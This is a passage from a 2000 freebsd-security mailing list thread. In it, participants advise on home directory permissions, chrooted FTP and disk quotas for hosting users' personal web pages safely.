(IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id QAA11131; Fri, 8 Sep 2000 16:19:25 -0600 (MDT) Message-Id: <4.3.2.7.2.20000908161720.04680100@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Fri, 08 Sep 2000 16:19:22 -0600 To: "Jonathan M. Slivko" , freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Re: Home Directories -- in the point of security? In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Symlink a ~/Web subdirectory into the user's directory and make that one world-readable. If updating Web pages is the only reason users use FTP, chroot them into their Web directories when they connect via FTP. Put quotas on the Web subdirectories, too. Some folks don't realize just how big their uncompressed (or badly compressed) images are. --Brett At 03:12 PM 9/8/2000, Jonathan M. Slivko wrote: >What chmod value should I use when modifying home directories to allow for >a personal website on a webserver without comprimsing security of the >files from other users, even reading the files is out of the question >entirely. > >---- >Jonathan M. Slivko >Technical Support: CoreSync Corparation >NSI ID: JSR730 > >Want a reliable shells? check us out at >http://www.coresync.net! >---- > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 15:21:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from rocket.coresync.net (ns1.coresync.net [64.71.131.2]) by hub.freebsd.org (Postfix) with SMTP id 95F5737B50F for ; Fri, 8 Sep 2000 15:21:49 -0700 (PDT) Received: (qmail 1290 invoked by uid 1117); 8 Sep 2000 22:12:52 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 8 Sep 2000 22:12:52 -0000 Date: Fri, 8 Sep 2000 15:12:52 -0700 (PDT) From: "Jonathan M. Slivko" To: Brett Glass Cc: freebsd-security@FreeBSD.ORG Subject: Re: Home Directories -- in the point of security? In-Reply-To: <4.3.2.7.2.20000908161720.04680100@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well, i'm not running this box as an ISP. I'm running this as a box for myself and a few of my friends. So, I have more than enough space to run all of what I need without having to put quotas on anything. -- Jonathan M. Slivko ---- Jonathan M. Slivko Technical Support: CoreSync Corparation NSI ID: JSR730 Want a reliable shells? check us out at http://www.coresync.net! ---- On Fri, 8 Sep 2000, Brett Glass wrote: > Symlink a ~/Web subdirectory into the user's directory and make that one > world-readable. If updating Web pages is the only reason users use FTP, > chroot them into their Web directories when they connect via FTP. Put > quotas on the Web subdirectories, too. Some folks don't realize just > how big their uncompressed (or badly compressed) images are. > > --Brett > > At 03:12 PM 9/8/2000, Jonathan M. Slivko wrote: > > >What chmod value should I use when modifying home directories to allow for > >a personal website on a webserver without comprimsing security of the > >files from other users, even reading the files is out of the question > >entirely. > > > >---- > >Jonathan M. Slivko > >Technical Support: CoreSync Corparation > >NSI ID: JSR730 > > > >Want a reliable shells? check us out at > >http://www.coresync.net! > >---- > > > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 15:31:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 445DF37B43F for ; Fri, 8 Sep 2000 15:31:41 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id QAA11248; Fri, 8 Sep 2000 16:31:33 -0600 (MDT) Message-Id: <4.3.2.7.2.20000908162832.04cff4c0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Fri, 08 Sep 2000 16:31:26 -0600 To: "Jonathan M. Slivko" From: Brett Glass Subject: Re: Home Directories -- in the point of security? Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: <4.3.2.7.2.20000908161720.04680100@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Even "friends" can sometimes overdo it. If you keep the pages in a separate FreeBSD partition and impose quotas, you'll be safer in that the system (which may be mission-critical for you) won't fall apart if someone inadvertently takes up a lot of space. This is especially important if you're letting your friends do CGI. --Brett At 04:12 PM 9/8/2000, Jonathan M. Slivko wrote: >Well, i'm not running this box as an ISP. I'm running this as a box for >myself and a few of my friends. So, I have more than enough space to run >all of what I need without having to put quotas on anything. > >-- Jonathan M. Slivko > >---- >Jonathan M. Slivko >Technical Support: CoreSync Corparation >NSI ID: JSR730 > >Want a reliable shells? check us out at >http://www.coresync.net! >---- > >On Fri, 8 Sep 2000, Brett Glass wrote: > >> Symlink a ~/Web subdirectory into the user's directory and make that one >> world-readable. If updating Web pages is the only reason users use FTP, >> chroot them into their Web directories when they connect via FTP. Put >> quotas on the Web subdirectories, too. Some folks don't realize just >> how big their uncompressed (or badly compressed) images are. >> >> --Brett >> >> At 03:12 PM 9/8/2000, Jonathan M. Slivko wrote: >> >> >What chmod value should I use when modifying home directories to allow for >> >a personal website on a webserver without comprimsing security of the >> >files from other users, even reading the files is out of the question >> >entirely. >> > >> >---- >> >Jonathan M. Slivko >> >Technical Support: CoreSync Corparation >> >NSI ID: JSR730 >> > >> >Want a reliable shells? check us out at >> >http://www.coresync.net! >> >---- >> > >> > >> > >> >To Unsubscribe: send mail to majordomo@FreeBSD.org >> >with "unsubscribe freebsd-security" in the body of the message >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 15:39:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from shell.futuresouth.com (shell.futuresouth.com [198.78.58.28]) by hub.freebsd.org (Postfix) with ESMTP id 2B45537B507 for ; Fri, 8 Sep 2000 15:39:28 -0700 (PDT) Received: (from fullermd@localhost) by shell.futuresouth.com (8.9.3/8.9.3) id RAA10878; Fri, 8 Sep 2000 17:39:19 -0500 (CDT) Date: Fri, 8 Sep 2000 17:39:18 -0500 From: "Matthew D. Fuller" To: Brett Glass Cc: "Jonathan M. Slivko" , freebsd-security@FreeBSD.ORG Subject: Re: Home Directories -- in the point of security? Message-ID: <20000908173918.D9652@futuresouth.com> References: <4.3.2.7.2.20000908161720.04680100@localhost> <4.3.2.7.2.20000908162832.04cff4c0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.3.2.7.2.20000908162832.04cff4c0@localhost>; from brett@lariat.org on Fri, Sep 08, 2000 at 04:31:26PM -0600 X-OS: FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Sep 08, 2000 at 04:31:26PM -0600, a little birdie told me that Brett Glass remarked > Even "friends" can sometimes overdo it. If you keep the pages in a > separate FreeBSD partition and impose quotas, you'll be safer in > that the system (which may be mission-critical for you) won't fall > apart if someone inadvertently takes up a lot of space. This is > especially important if you're letting your friends do CGI. Let friends alone :P Friends are easy. Friends are friendly. Friends know you know where they live. Friends know you're insane and if they putz up your box, they know to already have the flight out of the country scheduled. -- Matthew Fuller (MF4839) | fullermd@over-yonder.net Unix Systems Administrator | fullermd@futuresouth.com Specializing in FreeBSD | http://www.over-yonder.net/ "The only reason I'm burning my candle at both ends, is because I haven't figured out how to light the middle yet" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message